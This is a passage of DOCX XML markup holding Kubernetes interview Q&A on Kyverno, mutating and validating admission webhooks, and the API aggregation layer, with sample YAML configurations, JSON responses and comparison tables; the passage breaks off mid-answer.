        <w:t>YAML</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rego</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium–High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Learning curve</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Steep</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Mutation support</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource generation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No (native)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes-native feel</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very high</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes = office system</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kyverno = HR rules written in simple forms (YAML)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Gatekeeper = legal compliance system using a complex legal language</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kyverno architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Admission Webhooks (validate/mutate/generate)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Policy Controller (runs inside cluster)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Policy CRDs (YAML definitions)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t>Security enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Block privileged containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce non-root users</w:t>
        <w:br/>
        <w:t>Standardization</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Auto-add labels/annotations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce naming conventions</w:t>
        <w:br/>
        <w:t>Automation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Generate NetworkPolicies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Create default ConfigMaps</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No new language (YAML only)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Easy for Kubernetes users</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Strong built-in mutation features</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * GitOps friendly</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Native Kubernetes integration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Less expressive than Rego for complex logic</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Performance overhead for large clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Still evolving compared to Gatekeeper ecosystem</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Kyverno is a Kubernetes-native policy engine that uses YAML-based declarative policies to validate, mutate, and generate Kubernetes resources through admission webhooks, enabling security enforcement, configuration standardization, and automation without requiring a separate policy language.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q320. Explain mutating webhooks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Mutating Admission Webhook in Kubernetes is a custom admission controller that intercepts API requests and modifies (mutates) the object before it is stored in the cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A mutating webhook “edits” Kubernetes resources automatically before they are created or updated.</w:t>
        <w:br/>
        <w:t>It allows you to inject defaults, sidecars, labels, or configurations without changing application manifests.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where it fits in request flow</w:t>
        <w:br/>
        <w:t>kubectl → API Server → Authentication → Authorization → Mutating Webhook → Validating Webhook → etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Mutating webhook runs before validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Changes are applied first</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Then validation ensures correctness</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why mutating webhooks are used</w:t>
        <w:br/>
        <w:t>They help to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatically inject sidecars (e.g., service mesh proxies)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Add default labels/annotations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce standard configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Inject environment variables</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Attach security or monitoring agents</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. User sends a request (Pod, Deployment, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. API server forwards it to mutating webhook</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Webhook evaluates the object</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. Webhook returns a JSON patch</w:t>
        <w:br/>
        <w:t xml:space="preserve">         5. API server applies modifications</w:t>
        <w:br/>
        <w:t xml:space="preserve">         6. Object proceeds to validation stage</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example use cases</w:t>
        <w:br/>
        <w:t>1. Sidecar injection</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatically add Envoy proxy for service mesh (Istio)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Add default labels</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  labels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    team: devops</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Inject environment variables</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Add logging config</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Add tracing settings</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Security enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Add non-root user settings</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Inject seccomp profiles</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example webhook configuration</w:t>
        <w:br/>
        <w:t>apiVersion: admissionregistration.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: MutatingWebhookConfiguration</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: example-mutating-webhook</w:t>
        <w:br/>
        <w:t>webhooks:</w:t>
        <w:br/>
        <w:t>- name: mutate.example.com</w:t>
        <w:br/>
        <w:t xml:space="preserve">  clientConfig:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      name: webhook-service</w:t>
        <w:br/>
        <w:t xml:space="preserve">      namespace: default</w:t>
        <w:br/>
        <w:t xml:space="preserve">      path: /mutate</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - operations: ["CREATE"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    apiGroups: [""]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    apiVersions: ["v1"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resources: ["pods"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Response format (JSON Patch)</w:t>
        <w:br/>
        <w:t>Webhook returns patch like:</w:t>
        <w:br/>
        <w:t>[</w:t>
        <w:br/>
        <w:t xml:space="preserve">  {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "op": "add",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "path": "/metadata/labels/team",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "value": "devops"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Mutating vs Validating Webhooks</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Mutating Webhook</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Validating Webhook</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Modify object</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Approve/reject</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Action</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Changes request</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Only checks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Output</w:t>
        <w:br/>
        <w:tab/>
        <w:t>JSON patch</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Allow/Deny</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Order</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs first</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs after</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes API server = immigration checkpoint</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Mutating webhook = officer who updates your form before final processing (adds missing info, fixes format)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world examples</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Istio sidecar injection</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kyverno mutation policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Policy-based defaulting</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Security hardening tools</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automates configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reduces manual YAML duplication</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforces consistency</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enables platform-level defaults</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Risks / limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can make debugging harder (objects change unexpectedly)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Adds latency to API requests</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires careful versioning of webhook services</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Misconfigurations can block deployments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Keep logic simple and deterministic</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure high availability of webhook service</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Always test with dry-run mode</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Combine with validating webhooks for safety</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A mutating admission webhook in Kubernetes is a dynamic admission controller that intercepts API requests before persistence and modifies the resource definition by applying JSON patches, enabling automatic injection of configurations, defaults, and sidecars during object creation or update.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q321. What is validating webhook?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Validating Admission Webhook in Kubernetes is a custom admission controller that inspects Kubernetes API requests and either allows or rejects them based on defined rules, without modifying the object.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A validating webhook acts as a “final security checkpoint” that ensures only valid and compliant resources are allowed into the cluster.</w:t>
        <w:br/>
        <w:t>Unlike mutating webhooks, it does not change anything—it only validates.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where it fits in request flow</w:t>
        <w:br/>
        <w:t>kubectl → API Server → Authentication → Authorization → Mutating Webhook → Validating Webhook → etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Runs after mutating webhooks</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Runs before data is persisted</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Final decision: allow or reject</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why validating webhooks are used</w:t>
        <w:br/>
        <w:t>They help to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce security policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Validate resource configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevent misconfigured deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure compliance rules are followed</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Block unsafe Kubernetes objects</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. User submits a request (Pod, Deployment, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. API server sends object to validating webhook</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Webhook evaluates the object</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. Webhook returns:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Allowed = true → request proceeds</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Allowed = false → request rejected with message</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example use cases</w:t>
        <w:br/>
        <w:t>1. Security enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Block privileged containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevent root user containers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Resource validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure CPU/memory limits are set</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce minimum replicas</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Image policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Allow only trusted registries (e.g., company registry)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Naming/label rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce required labels like team, env</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example webhook configuration</w:t>
        <w:br/>
        <w:t>apiVersion: admissionregistration.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: ValidatingWebhookConfiguration</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: example-validating-webhook</w:t>
        <w:br/>
        <w:t>webhooks:</w:t>
        <w:br/>
        <w:t>- name: validate.example.com</w:t>
        <w:br/>
        <w:t xml:space="preserve">  clientConfig:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      name: webhook-service</w:t>
        <w:br/>
        <w:t xml:space="preserve">      namespace: default</w:t>
        <w:br/>
        <w:t xml:space="preserve">      path: /validate</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - operations: ["CREATE", "UPDATE"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    apiGroups: [""]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    apiVersions: ["v1"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resources: ["pods"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example response</w:t>
        <w:br/>
        <w:t>Allowed request</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "allowed": true</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Denied request</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "allowed": false,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "message": "Privileged containers are not allowed"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Validating vs Mutating webhooks</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Validating Webhook</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Mutating Webhook</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Enforce rules</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Modify objects</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Action</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Allow / Deny</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Change request</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Output</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Boolean decision</w:t>
        <w:br/>
        <w:tab/>
        <w:t>JSON patch</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Data change</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Order</w:t>
        <w:br/>
        <w:tab/>
        <w:t>After mutating</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Before validating</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes API server = building entrance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Mutating webhook = receptionist fixing your form</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Validating webhook = security guard checking if you are allowed inside</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world examples</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * OPA Gatekeeper policies (validation mode)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kyverno validation rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Image whitelist enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Security compliance checks</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Strong policy enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevents unsafe workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensures compliance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Centralized governance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Risks / limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can block deployments if misconfigured</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Adds latency to API requests</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires high availability of webhook service</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Debugging failures can be tricky</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Keep validation rules strict but predictable</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Always include clear error messages</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Run in audit mode before enforcing</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure webhook service redundancy</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Combine with mutating webhooks for consistency</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A validating admission webhook in Kubernetes is a policy enforcement mechanism that intercepts API requests after authentication and mutation to validate Kubernetes objects and either allow or reject them based on predefined rules, ensuring security, compliance, and correctness without modifying the resource.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q322. Explain API aggregation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: API Aggregation (API Aggregation Layer) in Kubernetes is a mechanism that allows the Kubernetes API server to be extended by registering additional API servers under it, so they appear as part of the same Kubernetes API.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>API aggregation lets Kubernetes expose new APIs as if they are native Kubernetes APIs, while actually forwarding requests to external services.</w:t>
        <w:br/>
        <w:t>It extends the Kubernetes API without modifying the core API server.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why API aggregation is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Extend Kubernetes functionality without changing core code</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Add custom APIs (metrics, monitoring, storage, ML, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Keep Kubernetes modular and extensible</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Separate core API from extended services</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where it fits in architecture</w:t>
        <w:br/>
        <w:t>kubectl → kube-apiserver → API Aggregation Layer → Extension API Server → Response</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Core API server acts as a proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requests are forwarded to registered API servers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. A user requests a custom API (e.g., /apis/custom.example.com/v1)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. Kubernetes API server checks APIService registration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Request is forwarded to external API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. External server processes request</w:t>
        <w:br/>
        <w:t xml:space="preserve">         5. Response is returned through Kubernetes API server</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key component: APIService</w:t>
        <w:br/>
        <w:t>An APIService object registers an external API server.</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>apiVersion: apiregistration.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: APIService</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: v1.custom.metrics.k8s.io</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name: metrics-server</w:t>
        <w:br/>
        <w:t xml:space="preserve">    namespace: monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">  group: custom.metrics.k8s.io</w:t>
        <w:br/>
        <w:t xml:space="preserve">  version: v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">  insecureSkipTLSVerify: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  groupPriorityMinimum: 100</w:t>
        <w:br/>
        <w:t xml:space="preserve">  versionPriority: 100</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of APIs in Kubernetes</w:t>
        <w:br/>
        <w:t>1. Core API</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Deployments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Extended APIs (via aggregation)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Metrics API</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Custom resource APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Monitoring APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Storage APIs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world examples</w:t>
        <w:br/>
        <w:t>1. Metrics Server</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Provides /metrics.k8s.io</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Used by HPA (Horizontal Pod Autoscaler)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Custom metrics APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Used for autoscaling based on business metrics</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Service Mesh APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Some service meshes expose aggregated APIs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>API aggregation vs CRDs</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>API Aggregation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CRDs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Implementation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>External API server</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes native extension</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Slightly heavier</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lightweight</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Flexibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very high</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complex APIs (metrics, services)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Custom resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Maintenance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Separate service</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Inside cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
